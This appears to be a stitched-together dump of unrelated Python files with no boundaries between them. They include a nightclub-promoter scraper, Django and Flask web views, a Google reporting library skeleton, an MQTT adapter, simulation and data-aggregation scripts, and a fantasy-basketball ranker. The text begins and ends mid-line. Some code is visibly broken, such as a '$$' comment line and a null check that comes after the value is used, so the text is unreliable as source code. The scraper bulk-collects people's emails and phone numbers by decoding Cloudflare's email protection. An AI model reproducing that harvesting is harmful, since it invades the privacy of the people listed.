write') parser.add_option('-i','-x','--xml-definition',dest='xmlFileName',default=None, help='XML definition file for the msg to use') parser.add_option('--doc-test',dest='doctest',default=False,action='store_true', help='run the documentation tests') parser.add_option('-p','--prefix',dest='prefix',default=False,action='store_true', help='put the field name in front of all function names.' +' Allows multiple messages in one file') parser.add_option('-v','--verbose',dest='verbose',default=False,action='store_true', help='run the tests run in verbose mode') (options,args) = parser.parse_args() success=True if options.doctest: import os; print os.path.basename(sys.argv[0]), 'doctests ...', argvOrig = sys.argv sys.argv= [sys.argv[0]] if options.verbose: sys.argv.append('-v') import doctest numfail,numtests=doctest.testmod() if numfail==0: print 'ok' else: print 'FAILED' success=False sys.argv = argvOrig # Restore the original args del argvOrig # hide from epydoc sys.exit() # FIX: Will this exit success? if None==options.xmlFileName: sys.exit('ERROR: must specify an xml definition file.') if None==options.outputFileName: sys.exit('ERROR: must specify an python file to write to.') generateWxPython(options.xmlFileName,options.outputFileName,prefixName=options.prefix ,verbose=options.verbose) print '\nrecommend running pychecker like this:' print ' pychecker -q',options.outputFileName from save_data import save_data from bs4 import BeautifulSoup import pandas as pd import requests import re # Url to RA website used to build links for each promoter base_url = 'https://www.residentadvisor.net' # Headers to mimic browser behavior headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'} # Using session() to keep cookies for ajax s = requests.Session() class Country: """ Holds country name and link """ def __init__(self, name, link): self.name = name self.link = link class City: """ Holds city/state name and link """ def __init__(self, name, link): self.name = name self.link = link class Promoter: """ Holds attributes for each promoter """ def __init__(self, *args): self.name = args[0] self.email = args[1] self.website = args[2] self.facebook = args[3] self.youtube = args[4] self.instagram = args[5] self.phone = args[6] self.twitter = args[7] # Got this from https://stackoverflow.com/questions/36911296/scraping-of-protected-email # Decoding CloudFlares email protection def decode_email(e): de = "" k = int(e[:2], 16) for i in range(2, len(e) - 1, 2): de += chr(int(e[i:i + 2], 16) ^ k) return de def get_countries(url): all_countries = [] r = s.get(url, headers=headers) r.raise_for_status() soup_country = BeautifulSoup(r.text, 'lxml') items = soup_country.find_all(class_='links') country_list = items[0].find_all('li') for item in country_list: all_countries.append(Country(name=item.text, link=item.find('a')['href'])) # print(item.attrs['data-id']) return all_countries def get_cities(url): all_cities = [] r = s.get(base_url + url, headers=headers) r.raise_for_status() soup_city = BeautifulSoup(r.text, 'lxml') items = soup_city.find_all(class_='links') # State/Region etc links have class parent # Links without parent class are for each city # But the parent class links will pull up all the sub-cities city_list = items[1].find_all('li', class_='parent') # Iterate over city_list to extract urls and append to all_cities for item in city_list: all_cities.append(City(name=item.text, link=item.find('a')['href'])) return all_cities def get_links(city_link): """ Gets url's of all the promoters :return: list of links corresponding to each Promoter and total number of records """ # Using created session to go to RA website r = s.get(base_url + city_link, headers=headers) r.raise_for_status() # Parsing through BS4 soup = BeautifulSoup(r.content, 'lxml') # Selecting html element Form1 which contains all promoters form = soup.find(id="Form1") # Finding all list items inside the Form1 table all_items = form.find_all('li') # Using set to hold links to automatically delete duplicates links = set() # Iterating over all list items (table) for item in all_items: link = item.find('a') # Finding all
tags if 'id=' in str(link): # If the href contains "id=" it points to a promoter links.add(link.get('href')) # Retrieve href (url) for every tag return list(links), len(links) def get_init_data(promoter_list, num_of_records): """ Goes to each promoter url inside the promoter_list to scrape data :param promoter_list: List returned from get_links() :param num_of_records: number of records to pull :return: final_list which holds Promoter object for each promoter """ # List holding Promoter class objects final_list = [] # Check what the user inputted for Number of Records to pull? if num_of_records == 0: # Setting number of records to length of list rec_to_pull = len(promoter_list) else: # Setting number of records to user input rec_to_pull = num_of_records # Iterating over promoter_list then running it through get_data() # Creating a new Promoter class object for each promoter # Then appending it to final list for link in promoter_list[0:rec_to_pull]: if check_if_active(link): final_list.append(Promoter(*get_data(link))) else: pass return final_list def check_if_active(promoter_link): """ Checks to see if promoter is active by looking at existence of events in it's events page :param promoter_link: link for each promoter with id :return: boolean if promoter has events or not """ # Checking if promoter is active by looking at number of events parameters = {'show': 'events'} # show=events parameters takes us to promoter events page r3 = s.get(base_url + promoter_link, params=parameters) # Parse data soup_events = BeautifulSoup(r3.text, 'lxml') # Find div that contains events div_for_events = soup_events.find(id='divArchiveEvents') # Pull up all table
  • tags inside above div # These are all events found events = div_for_events.find_all('li') # If the list 'events' is 0, then promoter has no events if len(events) > 0: return True else: return False def get_data(promoter_link): """ Gets Promoter data from the provided ind_link :param promoter_link: each link from the total promoters list :return: tuple of retrieved attributes """ # Creating the promoter url r2 = s.get(base_url + promoter_link) r2.raise_for_status() soup_promoter = BeautifulSoup(r2.text, 'lxml') # Getting the name of the Promoter name = soup_promoter.select_one('h1').text # Setting default values email = 'N/A' website = 'N/A' facebook = 'N/A' youtube = 'N/A' instagram = 'N/A' phone = 'N/A' twitter = 'N/A' try: # Looking for the section that has text "On the internet" # Then getting it's parent which contains all contact info social = soup_promoter.select_one('div:contains("On the internet")').parent try: email_class = social.select_one('a:contains("Email")') # CloudFlare hosted websites encode emails for protection email = decode_email(email_class.get('href').split('#')[1]) except: pass try: website_class = social.select_one('a:contains("Website")') website = website_class.get('href') except: pass try: facebook_class = social.select_one('a:contains("Facebook")') facebook = facebook_class.get('href') except: pass try: youtube_class = social.select_one('a:contains("Youtube")') youtube = youtube_class.get('href') except: pass try: instagram_class = social.select_one('a:contains("Instagram")') instagram = instagram_class.get('href') except: pass try: twitter_class = social.select_one('a:contains("Twitter")') twitter = twitter_class.get('href') except: pass except: pass try: # Getting the phone number
    inside a
  • phone_number = soup_promoter.select_one("li div:contains('Phone')").text # Running a regex search for selecting the phone number phone = re.findall(r'\d{10}', phone_number)[0] except: pass return name, email, website, facebook, youtube, instagram, phone, twitter def format_data(result_list): """ Creates a Data Frame with results from get_init_data() :param result_list: results from get_init_data() :return: Final Data Frame containing data for each Promoter """ df = pd.DataFrame() df['Name'] = [p.name for p in result_list] df['Email'] = [p.email for p in result_list] df['Phone'] = [p.phone for p in result_list] df['Website'] = [p.website for p in result_list] df['Facebook'] = [p.facebook for p in result_list] df['Youtube'] = [p.youtube for p in result_list] df['Instagram'] = [p.instagram for p in result_list] df['Twitter'] = [p.twitter for p in result_list] return df def show_results(final_df): """ Prints the final Data Frame from format_data() to console :param final_df: Final Data Frame from format_data() :return: Prints the Data Frame in console """ # Settings to print the data frame to console correctly desired_width = 480 pd.set_option('display.width', desired_width) pd.set_option('display.max_columns', 8) print(final_df) if __name__ == '__main__': print('Running Program...') countries = get_countries('https://www.residentadvisor.net/promoters.aspx') for country in countries: country_data = [] print('-' * 45) print(f'Getting data from {country.name}') print('-' * 45) cities = get_cities(url=country.link) for city in cities: promoters, total_records = get_links(city_link=city.link) print(f'Total Promoters Found in {city.name}: {total_records}') # rec = input('Records to pull (0 means all) > ') country_data.extend(get_init_data(promoter_list=promoters, num_of_records=int(0))) final_data_frame = format_data(country_data) print(f'Saving data for {country.name}...') print('-' * 45) save_data('Data', country.name, final_data_frame) # Uncomment this to show results in console show_results(final_data_frame) DevKor-Team/devkor_hackathon_back from rest_framework.permissions import IsAdminUser, IsAuthenticated from rest_framework.response import Response from rest_framework.views import APIView from .models import VoteSchedule from .serializers import VoteSerializer class VoteAPIView(APIView): permission_classes = [IsAuthenticated] def post(self, request, *args, **kwargs): team_id = request.data.get("team") demo_ids = request.data.get("demo", []) schedule = VoteSchedule.currently() if schedule.is_test and not request.user.is_staff: return Response({"detail": "Test voting is not allowed."}, status=403) if not schedule: return Response( {"error": "No vote schedule is currently active."}, status=400 ) if schedule.max_votes != len(demo_ids): return Response({"error": "Too many or less votes."}, status=400) votes = [ { "team": team_id, "demo": demo_id, "priority": i + 1, "schedule": schedule.id, } for i, demo_id in enumerate(demo_ids) ] serializer = VoteSerializer(data=votes, many=True, context={"request": request}) serializer.is_valid(raise_exception=True) serializer.save() return Response(serializer.data) class VotableAPIView(APIView): permission_classes = [IsAuthenticated] def get_response(self, votable): return Response({"votable": votable}) def get(self, request, *args, **kwargs): schedule = VoteSchedule.currently() if not schedule: return self.get_response(False) if schedule.is_test and not request.user.is_staff: return self.get_response(False) # TODO team year for team in request.user.teams.all(): if (not team.voted(schedule)) and (team.leader == request.user): return self.get_response(True) return self.get_response(False) class VoteResultAPIView(APIView): permission_classes = [IsAdminUser] def get(self, request, *args, **kwargs): schedule = VoteSchedule.past() if schedule.count() < 1: return Response({"error": "No past vote schedule."}, status=404) if not request.user.is_staff: return Response({"error": "No permission."}, status=403) return Response(schedule.last().get_result()) # -*- coding: utf-8 -*- """Pre-defined neural network layers based on TensorFlow. Capitalized layers should be classes inherited from base.Layer, while lower-cased ones should directly produce a tensor as the layer output. """ from .base import * from .dense import * from .linear import * from .regularization import * from .softmax import * godcrampy/py-graphics-h from typing import Dict from .token import Token, TokenType, LiteralType class Identifier(Token): def eval(self, variables: Dict[str, any]): return variables[self.name] def __init__(self, name: str, value, literal_type: LiteralType): super().__init__(TokenType.IDENTIFIER) self.name = name self.value = value self.literal_type = literal_type""" @Description: 绘制epochs次训练和测试损失的方法 @Author: tc @Time: 2021/6/14 10:54 """ import matplotlib.pyplot as plt from IPython import display def set_figsize(figsize=(3.5, 2.5)): use_svg_display() # 设置图的尺寸 plt.rcParams['figure.figsize'] = figsize def use_svg_display(): """Use svg format to display plot in jupyter""" display.set_matplotlib_formats('svg') def semilogy(x_vals, y_vals, x_label, y_label, x2_vals=None, y2_vals=None, legend=None, figsize=(3.5, 2.5)): set_figsize(figsize) plt.xlabel(x_label) plt.ylabel(y_label) plt.semilogy(x_vals, y_vals) if x2_vals and y2_vals: plt.semilogy(x2_vals, y2_vals, linestyle=':') plt.legend(legend) plt.show() from django import forms from backend.core.utils import APIClient class LocationForm(forms.Form): """LocationForm definition.""" location = forms.CharField(required=True) def clean_location(self): data = self.cleaned_data['location'] try: self.result = APIClient.get_or_create_temperature_info(data) except Exception as inst: raise forms.ValidationError(f'{inst}') return data #!/usr/bin/env python3 import os,sys base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(base_dir) from conf import config from core import main #$ 设置一个标记位,标记位数等于总的回合数 round_num = config.ROUND #$ 设置一个标记,标记等游戏的回合数,循环一次数值加1 num = 1 $$ 使用总的回合数循环,没次循环数值减1,数值等0的时候循环结束,也代表游戏结束 while round_num: print("第%s回合"%num) #$ 判断玩家输入的数字是否存在随机数列表中,这里使用int() 是因为函数处理玩数据return回来的数据类型是str,所以要使用int转换为整数型,才能判断是否存在随机数列表中。 if int(main.player.shoot()) in main.keeper.defense(): #$ 如果在,相当于守门员把球接住,守门员得分值加1 main.k1.fraction += 1 print("对不起,球被接住") print("%s,得分:%s %s,得分:%s" %(main.p1.name,main.p1.fraction,main.k1.name,main.k1.fraction)) else: #$ 如果不在,相当于球进了,玩家得分值加1 print("good,球进了") main.p1.fraction += 1 print("%s,得分:%s %s,得分:%s" %(main.p1.name,main.p1.fraction,main.k1.name,main.k1.fraction)) #$ 一个回合,总回合数减1,直到结果为0 round_num -= 1 #$ 一个回合,游戏的回合数加1 num += 1 else: #$ 判断两个人的得分情况,如果玩家的得分大于守门员,代表玩家赢 if main.p1.fraction > main.k1.fraction : print("good,你赢了") #$ 如果玩家得分小于守门员,代表守门员赢 elif main.p1.fraction < main.k1.fraction : print("很遗憾,你输了") #$ 如果得分相等,平局,这里考虑到有可能总的回合数设置的为偶数,会出现得分相等的情况 else: print("不错,平局") 0 with open('data/icudt66l.dat', 'rb') as f: contents = bytearray(f.read()) # encode the data into the stubdata file result_text = "" first = True for byte in contents: if first: result_text += str(byte) else: result_text += ", " + str(byte) first = False new_contents = """ // This file is generated by scripts/inline-data.py, do not edit it manually // #include "unicode/utypes.h" #include "unicode/udata.h" #include "unicode/uversion.h" extern "C" U_EXPORT const unsigned char U_ICUDATA_ENTRY_POINT [] = { %s }; """ % (result_text,) with open('icu/stubdata/stubdata.cpp', 'w+') as f: f.write(new_contents)oberlin/panoptespanoptes/analysis/panels/events/__init__.py from django import forms from panoptes.analysis.panels import BasePanel from panoptes.analysis.panels.events.lists import event_list_factory # Import all available event lists from panoptes.analysis.panels.events.lists import day, hour class Panel(BasePanel): """A panel that shows a list of events for a given period.""" slug = "events" template = "panoptes/analysis/panels/event_lists/panel.html" class Media: css = {'all': ("panoptes/css/analysis/panels/events/events.css",)} def __init__(self, *args, **kwargs): """Create a new event list.""" slug = kwargs.pop('list', None) if not slug: raise ValueError("You must provide a 'list' argument to the events panel") super(Panel, self).__init__(*args, **kwargs) EventList = event_list_factory(slug) self.event_list = EventList(self.sessions) self.event_list.get_events() def provide_template(self): """Render using the template of the event list, if one exists.""" return getattr(self.event_list, 'template', self.template) def provide_render_args(self): """Return render args for an event list panel and the chosen list.""" render_args = {'event_list': self.event_list} try: render_args.update(self.event_list.provide_render_args()) except AttributeError: pass return render_args def provide_media(self): """Return a Media instance for the events panel.""" return forms.Media(self.Media) app/auth/views.py from flask import render_template,redirect,url_for,flash,request from flask_login import login_user,logout_user,login_required from . import auth from ..models import User from .. import db from .forms import RegistrationForm,LoginForm @auth.route('/registration', methods=['GET','POST']) def register(): registration_form= RegistrationForm() if registration_form.validate_on_submit(): new_user = User(username=registration_form.sign_up_username.data,user_email=registration_form.sign_up_email.data,password=registration_form.sign_up_password.data) db.session.add(new_user) db.session.commit() return redirect(url_for('auth.login')) title= 'New Account' return render_template('auth/register.html',registration_form=registration_form,title=title) @auth.route('/login', methods=['GET','POST']) def login(): login_form= LoginForm() if login_form.validate_on_submit(): logged_in_user = User.query.filter_by(user_email=login_form.login_email.data).first() if logged_in_user is not None and logged_in_user.verify_password_hash(login_form.login_password.data): login_user(logged_in_user,login_form.remember_me.data) return redirect(request.args.get('next')or url_for('main.index')) flash('Invalid email or password!') title= 'Writer Login' return render_template('auth/login.html',login_form=login_form,title=title) @auth.route('/logout') @login_required def logout(): logout_user() return redirect(url_for('main.index'))google/report2bqapplication/classes/__init__.py # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from googleapiclient.discovery import Resource from googleapiclient.errors import HttpError from messytables.types import CellType from typing import Any, Dict, Iterable, List, Mapping, Tuple, Union from classes import credentials from classes import decorators from classes import discovery from classes import firestore from classes import gmail from classes import report_type from classes import services from classes.report_config import ReportConfig class Fetcher(object): @decorators.retry(exceptions=HttpError, tries=3, backoff=2) def fetch(self, method, **kwargs: Mapping[str, str]) -> Dict[str, Any]: result = method(**kwargs).execute() return result class ReportFetcher(object): report_type: report_type.Type service_definition: services.Service chunk_multiplier = int(os.environ.get('CHUNK_MULTIPLIER', 64)) email = None project = None profile = None @property def service(self) -> Resource: """Creates the API service for the product. Returns: Resource: the service definition """ return discovery.get_service( service=self.service_definition, credentials=credentials.Credentials(email=self.email, project=self.project)) def read_header(self, report_details: ReportConfig) -> Tuple[List[str], List[CellType]]: """Reads the header of the report CSV file. Args: report_details (dict): the report definition Returns: Tuple[List[str], List[CellType]]: the csv headers and column types """ pass def stream_to_gcs(self, bucket: str, report_details: ReportConfig) -> None: """Streams the report CSV to Cloud Storage. Args: bucket (str): GCS Bucket report_data (dict): Report definition """ pass def normalize_report_details(self, report_object: Dict[str, Any], report_id: str) -> Dict[str, Any]: """Normalizes the api format report into a flattened data structure. Args: report_object: Report details from api queries method report_id: the report id. Returns: result (Dict): the normalized data structure """ pass def fetch_report_config(self, report_object: Dict[str, Any], report_id: str) -> Dict[str, Any]: """Fetches a report configuration. This fetched the latest version of a report's configuration from the product, normalizes it fo the format that Report2BQ wants, and merges in the Report2BQ state fields. Args: report_object (Dict[str, Any]): the existing report object report_id (str): the report id Returns: Dict[str, Any]: the updated configuration """ report_data = self.normalize_report_details(report_object=report_object, report_id=report_id) keys_to_update = [ 'email', 'dest_dataset', 'dest_project', 'dest_table', 'notifier', 'schema', 'append', 'force', 'infer_schema'] for key in keys_to_update: if key in report_object: report_data[key] = report_object[key] return report_data def get_latest_report_file(self, report_id: str) -> Dict[str, Any]: """Fetch the last known successful report's definition. Args: report_id: report id Returns: result (Dict): the last known report, or an empty Dict if it has not yet run. """ pass def run_report(self, report_id: int, asynchronous: bool = True) -> Dict[str, Any]: """Runs a report on the product. Args: report_id (int): the report to run. asynchronous (bool): fire and forget or wait for the result. Returns: Dict[str, Any]: the run result """ pass def check_running_report(self, config: Dict[str, Any]): pass def get_reports(self) -> Dict[str, Any]: """Fetches a list of reports for current user. Returns: result (Dict): the list of reports for the current user. """ pass def get_report_definition(self, report_id: int, fields: str = None) -> Mapping[str, Any]: """Fetches the report definition. Args: report_id: report id Returns: the report definition """ pass def create_report(self, report: Mapping[str, Any]) -> Union[str, Mapping[str, Any]]: """Creates a new report. Args: report (Mapping[str, Any]): the report definition Returns: Union[str, Mapping[str, Any]]: the report, or the error. """ pass class ReportRunner(object): report_type = None project = None email = None @decorators.lazy_property def firestore(self) -> firestore.Firestore: return firestore.Firestore(project=self.project, email=self.email) def run(self, unattended: bool): """Runs the report. Args: unattended (bool): wait for the result or just run and log for the run monitor. """ pass def _email_error(self, message: str, email: str = None, error: Exception = None) -> None: """Emails the error to the owner, and the administrator if defined. Args: message (str): the message email (str, optional): report owner email. Defaults to None. error (Exception, optional): any error. Defaults to None. """ to = [email] if email else [] administrator = \ os.environ.get('ADMINISTRATOR_EMAIL') or \ self.FIRESTORE.get_document(report_type.Type._ADMIN, 'admin').get('email') cc = [administrator] if administrator else [] if to or cc: body = f'{message}{gmail.error_to_trace(error)}' message = gmail.GMailMessage(to=to, cc=cc, subject=f'Error in report_loader', body=body, project=self.project) gmail.send_message(message=message, credentials=credentials.Credentials( email=email, project=self.project)) def strip_nulls(value: Iterable) -> Iterable: """Removes null values from iterables. Recursively remove all None values from dictionaries and lists, and returns the result as a new dictionary or list. Args: value (Any): any list or dict to have empty values removed. """ if isinstance(value, list): return [strip_nulls(x) for x in value if x is not None] elif isinstance(value, dict): return { key: strip_nulls(val) for key, val in value.items() if val is not None } else: return value memory_size = 8 def read_from_ref(path): file = open(path, 'r') lines = file.readlines() total_count = 0 hit_count, miss_count = 0, 0 trace_lst = [] physical_memory = [] for line in lines: # print("Line{}: {}".format(count, line.strip())) total_count +=1 address = line.strip().split(' ')[1] trace_lst.append(address) assert(len(trace_lst) == total_count) for i in range(len(trace_lst)): # print("access trace number: {}, trace is {}\n".format(i+1, trace_lst[i])) # print("before:\n") # print(physical_memory) if trace_lst[i] in physical_memory: hit_count +=1 else: miss_count += 1 if len(physical_memory) < memory_size: physical_memory.append(trace_lst[i]) else: # need to replace page reversed_remain_trace_lst = trace_lst[i+1:][::-1] #find the one in physical memory which will not be used for the longest time in future. idx = 0 invisible_index = 100000 if physical_memory[idx] in reversed_remain_trace_lst: invisible_index = reversed_remain_trace_lst.index(physical_memory[idx]) else: invisible_index = -1 # physical_memory[idx] = trace_lst[i] # continue for j in range(memory_size): if physical_memory[j] in reversed_remain_trace_lst: temp_index = reversed_remain_trace_lst.index(physical_memory[j]) if temp_index < invisible_index: idx = j invisible_index = temp_index else: idx = j invisible_index = -1 # replace physical_memory[idx] = trace_lst[i] # print("after:\n") # print(physical_memory) # print("-----------------------------------------------------") assert(hit_count + miss_count == total_count) hit_rate = hit_count / (hit_count + miss_count) print("hit count: {}\n".format(hit_count)) print("miss count: {}\n".format(miss_count)) print("hit rate: {}\n".format(hit_rate)) if __name__ == '__main__': read_from_ref("trace3.ref")N = int(input()) H = 0 M = 0 for i in range(N): S = int(input()) if S == 1: H = H + 1 else: M = M + 1 print(H) print(M) src/cancer/adapter/mqtt.py from __future__ import annotations import logging import os from dataclasses import dataclass from typing import Type, Callable, Optional, Dict from cancer.message import Message, Topic from cancer.port.publisher import Publisher from cancer.port.subscriber import Subscriber, T from paho.mqtt.publish import single from paho.mqtt.subscribe import callback _LOG = logging.getLogger(__name__) @dataclass class MqttConfig: host: str port: int user: str password: str use_tls: bool transport: Optional[str] = None @property def effective_transport(self) -> str: return self.transport or "tcp" @property def auth(self) -> Dict[str, str]: return {"username": self.user, "password": self.password} @staticmethod def _get_required(key: str) -> str: result = os.getenv(key) if not result: raise ValueError(f"Missing key: {key}") return result @classmethod def from_env(cls) -> MqttConfig: return cls( host=cls._get_required("MQTT_HOST"), port=int(cls._get_required("MQTT_PORT")), user=cls._get_required("MQTT_USER"), password=cls._get_required("MQTT_PASSWORD"), use_tls=cls._get_required("MQTT_TLS_ENABLE") == "true", transport=os.getenv("MQTT_TRANSPORT"), ) @dataclass class MqttPublisher(Publisher): config: MqttConfig def publish(self, topic: Topic, message: Message): _LOG.debug("Publishing message %s", message) single( qos=1, topic=f"cancer/{topic.value}", payload=message.serialize(), hostname=self.config.host, port=self.config.port, transport=self.config.effective_transport, auth=self.config.auth, tls={} if self.config.use_tls else None, ) @dataclass class MqttSubscriber(Subscriber): config: MqttConfig def subscribe( self, topic: Topic, message_type: Type[T], handle: Callable[[T], Subscriber.Result], ): def on_message(client, userdata, message): payload = message.payload _LOG.debug("Received message with payload %s", payload) handle(message_type.deserialize(payload)) callback( on_message, topics=[topic.value], qos=1, hostname=self.config.host, port=self.config.port, transport=self.config.effective_transport, auth=self.config.auth, tls={} if self.config.use_tls else None, ) from allennlp_models.tagging.predictors.sentence_tagger import SentenceTaggerPredictor ''' Aggregate data ''' import argparse, os, sys, errno, subprocess, csv phenotypic_traits = ["not","nand","and","ornot","or","andnot"]#,"nor","xor","equals"] even_traits = {"not", "and", "or"}#, "nor", "equals"} odd_traits = {"nand", "ornot", "andnot", "xor"}#, "equals"} even_profile = "101010"#101" odd_profile = "010101"#011" all_profile = "111111"#111" """ This is functionally equivalent to the mkdir -p [fname] bash command """ def mkdir_p(path): try: os.makedirs(path) except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def extract_params_cmd_log(path): content = None with open(path, "r") as fp: content = fp.read().strip() content = content.replace("./avida", "") params = [param.strip() for param in content.split("-set") if param.strip() != ""] cfg = {param.split(" ")[0]:param.split(" ")[1] for param in params} return cfg def read_avida_dat_file(path): content = None with open(path, "r") as fp: content = fp.read().strip().split("\n") legend_start = 0 legend_end = 0 # Where does the legend table start? for line_i in range(0, len(content)): line = content[line_i].strip() if line == "# Legend:": # Handles analyze mode detail files. legend_start = line_i + 1 break if "# 1:" in line: # Handles time.dat file. legend_start = line_i break # For each line in legend table, extract field fields = [] for line_i in range(legend_start, len(content)): line = content[line_i].strip() if line == "": legend_end = line_i break fields.append( line.split(":")[-1].strip().lower().replace(" ", "_") ) data = [] for line_i in range(legend_end, len(content)): line = content[line_i].strip() if line == "": continue data_line = line.split(" ") if len(data_line) != len(fields): print("data fields mismatch!") print(fields) print(data_line) exit(-1) data.append({field:value for field,value in zip(fields, data_line)}) return data def simple_match_coeff(a, b): if len(a) != len(b): print(f"Length mismatch! {a} {b}") exit(-1) return sum(ai==bi for ai,bi in zip(a,b)) def main(): parser = argparse.ArgumentParser(description="Run submission script.") parser.add_argument("--data_dir_file", type=str, help="Filename that lists all data directories") parser.add_argument("--output_dir", type=str, help="Where to dump this?", default=".") args = parser.parse_args() data_dir_filename = args.data_dir_file output_dir = args.output_dir mkdir_p(output_dir) # Aggregate run directories. run_dirs = [] with open(data_dir_filename, 'r') as fp: for line in fp: line = line.strip() if line != '': run_dirs.append(line) # For each run directory: # - get id, get command line configuration settings summary_header = None summary_content_lines = [] file_str = '' for run_dir in run_dirs: if not os.path.exists(os.path.join(run_dir, 'data', 'analysis')): print('Skipping: ', run_dir) continue summary_info = {} # Hold summary information about run. (one entry per run) print(f"processing {run_dir}") ############################################################ # Extract commandline configuration settings (from cmd.log file) cmd_log_path = os.path.join(run_dir, "cmd.log") cmd_params = extract_params_cmd_log(cmd_log_path) # Infer environmental change and change rate from events file chg_env = "chg" in cmd_params["EVENT_FILE"] env_cond = cmd_params["EVENT_FILE"].split(".")[0].replace("events-", "").lower() seed = cmd_params["RANDOM_SEED"] sensors = cmd_params["DISABLE_REACTION_SENSORS"] summary_info["chg_env"] = chg_env summary_info["environment"] = env_cond for field in cmd_params: summary_info[field] = cmd_params[field] ############################################################ ############################################################ # Extract environment-specific one-step mutant information. if not os.path.exists(os.path.join(run_dir, "data", "analysis", "env_all", "knockouts.dat")): print('Skipping (all): ', run_dir) continue if not os.path.exists(os.path.join(run_dir, "data", "analysis", "env_odd", "knockouts.dat")): print('Skipping (odd): ', run_dir) continue if not os.path.exists(os.path.join(run_dir, "data", "analysis", "env_even", "knockouts.dat")): print('Skipping (even): ', run_dir) continue muts_env_all = read_avida_dat_file(os.path.join(run_dir, "data", "analysis", "env_all", "knockouts.dat")) muts_env_odd = read_avida_dat_file(os.path.join(run_dir, "data", "analysis", "env_odd", "knockouts.dat")) muts_env_even = read_avida_dat_file(os.path.join(run_dir, "data", "analysis", "env_even", "knockouts.dat")) # (each of these files should only have one genotype in them) if len(muts_env_all) <= 1 and len(muts_env_even) <= 1 and len(muts_env_odd) <= 1: print("Unexpected number of genotypes in final_dominant data files.") exit(-1) for org_id in range(len(muts_env_all)): phenotype_even = "".join([muts_env_even[org_id][trait] for trait in phenotypic_traits]) phenotype_odd = "".join([muts_env_odd[org_id][trait] for trait in phenotypic_traits]) phenotype_all = "".join([muts_env_all[org_id][trait] for trait in phenotypic_traits]) phenotype_task_order = ";".join(phenotypic_traits) change_odd_even = phenotype_even != phenotype_odd match_score_even = simple_match_coeff(phenotype_even, even_profile) match_score_odd = simple_match_coeff(phenotype_odd, odd_profile) match_score_all = simple_match_coeff(phenotype_all, all_profile) file_str += \ str(chg_env) + ',' + \ env_cond + ',' + \ sensors + ',' + \ seed + ',' + \ str(org_id) + ',' + \ muts_env_all[org_id]['fitness'] + ',' + \ muts_env_odd[org_id]['fitness'] + ',' + \ muts_env_even[org_id]['fitness'] + ',' + \ phenotype_all + ',' + \ phenotype_odd + ',' + \ phenotype_even + ',' + \ phenotype_task_order + ',' + \ str(change_odd_even) + ',' + \ str(match_score_all) + ',' + \ str(match_score_odd) + ',' + \ str(match_score_even) + \ '\n' # write out aggregate data with open(os.path.join(output_dir, "knockout_data.csv"), "w") as fp: out_content = 'chg_env,environment,sensors,seed,org_id,fit_all,fit_odd,fit_even,phenotype_all,phenotype_odd,phenotype_even,phenotype_task_order,change_odd_even,match_score_all,match_score_odd,match_score_even\n' + file_str fp.write(out_content) if __name__ == "__main__": main() 1-10 from math import sqrt from espn_api.basketball import League from termcolor import colored from constantsForLeague import ESPN_s2, SWID, LEAGUE_ID, LEAGUE_SEASON, FULL_SEASON_STATS, LAST7DAYS_STATS, LAST15DAYS_STATS, LAST30DAYS_STATS playersDic = {} statsDic = {} minsList = [] mainLeague = League(league_id=LEAGUE_ID, year=LEAGUE_SEASON, espn_s2=ESPN_s2, swid=SWID) yourTeam = mainLeague.teams[7] yourPlayers = yourTeam.roster agents = mainLeague.free_agents(size=300) agents = agents + yourPlayers # Function for Fantasy Points (FUll SEASON / HEAD TO HEAD) # def myPoints(player): points = 0 points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FGM'] * 2 points -= player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FGM'] - \ player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FGA'] points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FTM'] points -= player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FTA'] - \ player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['FTM'] points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['3PTM'] points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['OREB'] + \ player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['DREB'] points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['AST'] * 2 points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['STL'] * 4 points -= player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['TO'] * 2 points += player.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['PTS'] return points # Method for getting key value# def get_key(val): for key, value in playersDic.items(): if val == value: return key return "key doesn't exist" # Main Code to Create Dictionary { PlayerName : Ranking Metric } # for players in agents: if ((players.__getattribute__('injuryStatus') == 'ACTIVE') or (players.__getattribute__('injuryStatus')) == 'NORMAL') and ( LAST7DAYS_STATS in players.__getattribute__('stats').keys()) and ( LAST15DAYS_STATS in players.__getattribute__('stats').keys()) and ( LAST30DAYS_STATS in players.__getattribute__('stats').keys()) and ( players.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['MIN'] >= 25): # vars # pointsPerMin = myPoints(players) / players.__getattribute__('stats')[FULL_SEASON_STATS]['avg']['MIN'] lastSevenDayAverageMin = players.__getattribute__('stats')[LAST7DAYS_STATS]['avg']['MIN'] lastFifteenDayAverageMin = players.__getattribute__('stats')[LAST15DAYS_STATS]['avg']['MIN'] lastThirdlyDayAverageMin = players.__getattribute__('stats')[LAST30DAYS_STATS]['avg']['MIN'] minsList.append(lastThirdlyDayAverageMin) minsList.append(lastFifteenDayAverageMin) minsList.append(lastSevenDayAverageMin) xAxis = [1, 2, 3] slope = 0 count = 0 # Slope Calculation: See Equations.txt # for num in range(0, 3): xSum = 6 ySum = + minsList[num] xySum = + minsList[num] * xAxis[num] delta = 6 slope = 3 * xySum - (xSum * ySum) / 6 # Distance Formula: See Equations.txt # xValue = slope ** 2 yValue = pointsPerMin ** 2 ranking = sqrt((0.2 